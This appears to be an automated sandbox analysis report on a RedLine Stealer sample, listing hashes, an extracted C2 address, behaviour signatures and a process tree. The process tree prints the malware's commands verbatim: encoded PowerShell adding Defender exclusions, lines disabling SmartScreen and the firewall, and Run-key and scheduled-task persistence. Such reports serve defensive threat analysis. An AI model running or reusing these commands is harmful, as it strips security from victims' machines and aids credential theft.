Analysis
-
max time kernel
83s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-07-2022 14:33
General
-
Target
47645.exe
-
Size
1.8MB
-
MD5
30b6d624d18490acfe42a1944c6d3172
-
SHA1
35402770ba44139f50b5613c274a6b4607be3b16
-
SHA256
d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
-
SHA512
42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c
Malware Config
Extracted
redline
1327052997
37.235.54.26:8362
Signatures
-
Modifies security service 2 TTPs 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of WriteProcessMemory 32 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\47645.exe"C:\Users\Admin\AppData\Local\Temp\47645.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\doc.exe"C:\Users\Admin\AppData\Local\Temp\doc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\GameInject.exe"C:\Users\Admin\AppData\Local\Temp\GameInject.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGYAaQB3AEcAOQBOADcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1ADIAQgBxAEIATwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAFUANgBxAG8AWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEgAUgBLACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGYAaQB3AEcAOQBOADcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1ADIAQgBxAEIATwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAFUANgBxAG8AWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEgAUgBLACMAPgA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8743" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8743" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DllHost.exe"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3372 -s 20643⤵
- Program crash
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 3372 -ip 33721⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
Filesize
1KB
MD5ddab5e26e538fa9c9f65b6ba13523eb8
SHA1003942014894706e2498020df601e97b2cd27a56
SHA25629892a9f94bf3e6e8a675fbdb4faf6e31af24547820d031c23fe78adcf750a31
SHA512f836fc230e0447b28319390eeaec09ed6e750178f9c0c9e9e43e50c6892c1b2c6138ab96c39c56c7bf9963e9cf06d8cb93801e99ad3465f5ff95d3ce2708b5ab
-
Filesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
Filesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
Filesize
82KB
MD50720a011066bb50774deffd33c5903c8
SHA154c4393d7f15192717339ab39be1978127443c79
SHA2560db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6
SHA512410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248
-
Filesize
82KB
MD50720a011066bb50774deffd33c5903c8
SHA154c4393d7f15192717339ab39be1978127443c79
SHA2560db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6
SHA512410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248
-
Filesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
-
Filesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
-
-
-
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
-
-
Filesize
408KB
-
-
Filesize
1.8MB
-
Filesize
5.2MB
-
Filesize
584KB
-
Filesize
472KB
-
Filesize
5.6MB
-
Filesize
120KB
-
Filesize
240KB
-
Filesize
1.0MB
-
Filesize
72KB
-
Filesize
6.1MB
-
Filesize
120KB
-
-
Filesize
40KB
-
Filesize
120KB
-
-
Filesize
6.2MB
-
Filesize
40KB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
104KB
-
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
600KB
-
Filesize
56KB
-
-